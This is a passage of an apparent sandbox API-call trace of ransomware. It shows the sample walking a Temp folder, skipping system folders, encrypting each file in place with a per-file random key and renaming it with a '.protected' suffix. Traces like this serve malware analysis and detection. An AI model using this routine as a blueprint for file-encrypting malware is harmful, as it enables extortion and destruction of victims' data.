HALPmcxz\\AppData\\Local\\Temp\\GoxtxhkLQv.m4a") returned 67 [0086.794] StrStrIW (lpFirst="GoxtxhkLQv.m4a", lpSrch=".protected") returned 0x0 [0086.794] lstrcmpW (lpString1="GoxtxhkLQv.m4a", lpString2="RESTORE_FILES.txt") returned -1 [0086.794] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0086.795] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x30) returned 1 [0086.795] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\GoxtxhkLQv.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\goxtxhklqv.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0086.795] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\GoxtxhkLQv.m4a") returned 67 [0086.795] StrStrW (lpFirst="GoxtxhkLQv.m4a", lpSrch=".txt") returned 0x0 [0086.795] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\GoxtxhkLQv.m4a") returned 67 [0086.795] StrStrW (lpFirst="GoxtxhkLQv.m4a", lpSrch=".rar") returned 0x0 [0086.795] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\GoxtxhkLQv.m4a") returned 67 [0086.795] StrStrW (lpFirst="GoxtxhkLQv.m4a", lpSrch=".zip") returned 0x0 [0086.795] ReadFile (in: hFile=0xd8, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0086.796] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0086.796] WriteFile (in: hFile=0xd8, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0086.797] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.797] WriteFile (in: hFile=0xd8, lpBuffer=0x295ec6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x295ec6c*, lpNumberOfBytesWritten=0x295ec94*=0x4, lpOverlapped=0x0) returned 1 [0086.797] WriteFile (in: hFile=0xd8, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ec94*=0x30, lpOverlapped=0x0) returned 1 [0086.797] CloseHandle (hObject=0xd8) returned 1 [0086.798] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\GoxtxhkLQv.m4a.protected") returned 77 [0086.798] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\GoxtxhkLQv.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\goxtxhklqv.m4a"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\GoxtxhkLQv.m4a.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\goxtxhklqv.m4a.protected")) returned 1 [0086.799] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0086.799] lstrcmpiW (lpString1="GVS3vvSLcwTIm2-0.mp3", lpString2="Windows") returned -1 [0086.799] lstrcmpiW (lpString1="GVS3vvSLcwTIm2-0.mp3", lpString2="Program Files") returned -1 [0086.799] lstrcmpiW (lpString1="GVS3vvSLcwTIm2-0.mp3", lpString2="Program Files (x86)") returned -1 [0086.799] lstrcmpiW (lpString1="GVS3vvSLcwTIm2-0.mp3", lpString2="$Recycle.bin") returned 1 [0086.799] lstrcmpiW (lpString1="GVS3vvSLcwTIm2-0.mp3", lpString2="System Volume Information") returned -1 [0086.799] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\GVS3vvSLcwTIm2-0.mp3") returned 73 [0086.799] StrStrIW (lpFirst="GVS3vvSLcwTIm2-0.mp3", lpSrch=".protected") returned 0x0 [0086.799] lstrcmpW (lpString1="GVS3vvSLcwTIm2-0.mp3", lpString2="RESTORE_FILES.txt") returned -1 [0086.799] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0086.799] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x30) returned 1 [0086.799] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\GVS3vvSLcwTIm2-0.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\gvs3vvslcwtim2-0.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0086.799] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\GVS3vvSLcwTIm2-0.mp3") returned 73 [0086.799] StrStrW (lpFirst="GVS3vvSLcwTIm2-0.mp3", lpSrch=".txt") returned 0x0 [0086.799] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\GVS3vvSLcwTIm2-0.mp3") returned 73 [0086.799] StrStrW (lpFirst="GVS3vvSLcwTIm2-0.mp3", lpSrch=".rar") returned 0x0 [0086.799] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\GVS3vvSLcwTIm2-0.mp3") returned 73 [0086.800] StrStrW (lpFirst="GVS3vvSLcwTIm2-0.mp3", lpSrch=".zip") returned 0x0 [0086.800] ReadFile (in: hFile=0xd8, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0086.801] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0086.801] WriteFile (in: hFile=0xd8, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0086.802] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.802] WriteFile (in: hFile=0xd8, lpBuffer=0x295ec6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x295ec6c*, lpNumberOfBytesWritten=0x295ec94*=0x4, lpOverlapped=0x0) returned 1 [0086.802] WriteFile (in: hFile=0xd8, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ec94*=0x30, lpOverlapped=0x0) returned 1 [0086.802] CloseHandle (hObject=0xd8) returned 1 [0086.803] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\GVS3vvSLcwTIm2-0.mp3.protected") returned 83 [0086.803] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\GVS3vvSLcwTIm2-0.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\gvs3vvslcwtim2-0.mp3"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\GVS3vvSLcwTIm2-0.mp3.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\gvs3vvslcwtim2-0.mp3.protected")) returned 1 [0086.804] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0086.804] lstrcmpiW (lpString1="gY45.wav", lpString2="Windows") returned -1 [0086.804] lstrcmpiW (lpString1="gY45.wav", lpString2="Program Files") returned -1 [0086.804] lstrcmpiW (lpString1="gY45.wav", lpString2="Program Files (x86)") returned -1 [0086.804] lstrcmpiW (lpString1="gY45.wav", lpString2="$Recycle.bin") returned 1 [0086.804] lstrcmpiW (lpString1="gY45.wav", lpString2="System Volume Information") returned -1 [0086.804] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\gY45.wav") returned 61 [0086.804] StrStrIW (lpFirst="gY45.wav", lpSrch=".protected") returned 0x0 [0086.804] lstrcmpW (lpString1="gY45.wav", lpString2="RESTORE_FILES.txt") returned -1 [0086.804] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0086.804] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x30) returned 1 [0086.804] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\gY45.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\gy45.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0086.805] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\gY45.wav") returned 61 [0086.805] StrStrW (lpFirst="gY45.wav", lpSrch=".txt") returned 0x0 [0086.805] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\gY45.wav") returned 61 [0086.805] StrStrW (lpFirst="gY45.wav", lpSrch=".rar") returned 0x0 [0086.805] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\gY45.wav") returned 61 [0086.805] StrStrW (lpFirst="gY45.wav", lpSrch=".zip") returned 0x0 [0086.805] ReadFile (in: hFile=0xd8, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0086.806] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0086.806] WriteFile (in: hFile=0xd8, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0086.807] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.807] WriteFile (in: hFile=0xd8, lpBuffer=0x295ec6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x295ec6c*, lpNumberOfBytesWritten=0x295ec94*=0x4, lpOverlapped=0x0) returned 1 [0086.807] WriteFile (in: hFile=0xd8, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ec94*=0x30, lpOverlapped=0x0) returned 1 [0086.807] CloseHandle (hObject=0xd8) returned 1 [0086.807] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\gY45.wav.protected") returned 71 [0086.807] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\gY45.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\gy45.wav"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\gY45.wav.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\gy45.wav.protected")) returned 1 [0086.809] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0086.809] lstrcmpiW (lpString1="History", lpString2="Windows") returned -1 [0086.809] lstrcmpiW (lpString1="History", lpString2="Program Files") returned -1 [0086.809] lstrcmpiW (lpString1="History", lpString2="Program Files (x86)") returned -1 [0086.809] lstrcmpiW (lpString1="History", lpString2="$Recycle.bin") returned 1 [0086.809] lstrcmpiW (lpString1="History", lpString2="System Volume Information") returned -1 [0086.809] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\History") returned 60 [0086.809] lstrcmpW (lpString1="History", lpString2=".") returned 1 [0086.809] lstrcmpW (lpString1="History", lpString2="..") returned 1 [0086.809] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\History\\*") returned 62 [0086.809] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\History\\*", lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0x47ba50 [0086.810] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0086.810] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0086.810] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0086.810] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0086.810] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0086.810] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\History\\.") returned 62 [0086.810] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0086.810] StrStrIW (lpFirst=".", lpSrch=".protected") returned 0x0 [0086.810] lstrcmpW (lpString1=".", lpString2="RESTORE_FILES.txt") returned -1 [0086.810] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0086.810] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x30) returned 1 [0086.810] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\History\\." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\history\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0086.810] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0086.810] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0086.811] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0086.811] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0086.811] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0086.811] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0086.811] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\History\\..") returned 63 [0086.811] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0086.811] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0086.811] StrStrIW (lpFirst="..", lpSrch=".protected") returned 0x0 [0086.811] lstrcmpW (lpString1="..", lpString2="RESTORE_FILES.txt") returned -1 [0086.811] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0086.811] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x30) returned 1 [0086.811] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\History\\.." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0086.811] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0086.811] lstrcmpiW (lpString1="History.IE5", lpString2="Windows") returned -1 [0086.811] lstrcmpiW (lpString1="History.IE5", lpString2="Program Files") returned -1 [0086.811] lstrcmpiW (lpString1="History.IE5", lpString2="Program Files (x86)") returned -1 [0086.811] lstrcmpiW (lpString1="History.IE5", lpString2="$Recycle.bin") returned 1 [0086.811] lstrcmpiW (lpString1="History.IE5", lpString2="System Volume Information") returned -1 [0086.811] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\History\\History.IE5") returned 72 [0086.811] lstrcmpW (lpString1="History.IE5", lpString2=".") returned 1 [0086.811] lstrcmpW (lpString1="History.IE5", lpString2="..") returned 1 [0086.811] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\History\\History.IE5\\*") returned 74 [0086.811] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\History\\History.IE5\\*", lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0x47ba90 [0086.812] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0086.812] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0086.812] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0086.812] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0086.812] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0086.812] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\History\\History.IE5\\.") returned 74 [0086.812] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0086.812] StrStrIW (lpFirst=".", lpSrch=".protected") returned 0x0 [0086.812] lstrcmpW (lpString1=".", lpString2="RESTORE_FILES.txt") returned -1 [0086.812] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0086.812] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0086.812] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\History\\History.IE5\\." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\history\\history.ie5\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0086.812] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0086.812] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0086.812] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0086.812] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0086.812] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0086.812] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0086.812] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\History\\History.IE5\\..") returned 75 [0086.812] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0086.812] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0086.812] StrStrIW (lpFirst="..", lpSrch=".protected") returned 0x0 [0086.812] lstrcmpW (lpString1="..", lpString2="RESTORE_FILES.txt") returned -1 [0086.812] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0086.812] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0086.813] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\History\\History.IE5\\.." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\history"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0086.813] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0086.813] lstrcmpiW (lpString1="desktop.ini", lpString2="Windows") returned -1 [0086.813] lstrcmpiW (lpString1="desktop.ini", lpString2="Program Files") returned -1 [0086.813] lstrcmpiW (lpString1="desktop.ini", lpString2="Program Files (x86)") returned -1 [0086.813] lstrcmpiW (lpString1="desktop.ini", lpString2="$Recycle.bin") returned 1 [0086.813] lstrcmpiW (lpString1="desktop.ini", lpString2="System Volume Information") returned -1 [0086.813] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\History\\History.IE5\\desktop.ini") returned 84 [0086.813] StrStrIW (lpFirst="desktop.ini", lpSrch=".protected") returned 0x0 [0086.813] lstrcmpW (lpString1="desktop.ini", lpString2="RESTORE_FILES.txt") returned -1 [0086.813] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0086.813] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0086.813] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\History\\History.IE5\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\history\\history.ie5\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0086.814] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\History\\History.IE5\\desktop.ini") returned 84 [0086.814] StrStrW (lpFirst="desktop.ini", lpSrch=".txt") returned 0x0 [0086.814] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\History\\History.IE5\\desktop.ini") returned 84 [0086.814] StrStrW (lpFirst="desktop.ini", lpSrch=".rar") returned 0x0 [0086.814] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\History\\History.IE5\\desktop.ini") returned 84 [0086.814] StrStrW (lpFirst="desktop.ini", lpSrch=".zip") returned 0x0 [0086.814] ReadFile (in: hFile=0x150, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295e7b4*=0x91, lpOverlapped=0x0) returned 1 [0086.815] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xffffff6f, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0086.815] WriteFile (in: hFile=0x150, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x91, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295e7b4*=0x91, lpOverlapped=0x0) returned 1 [0086.815] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.815] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0086.815] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0086.815] CloseHandle (hObject=0x150) returned 1 [0086.816] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\History\\History.IE5\\desktop.ini.protected") returned 94 [0086.816] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\History\\History.IE5\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\history\\history.ie5\\desktop.ini"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\History\\History.IE5\\desktop.ini.protected" (normalized: 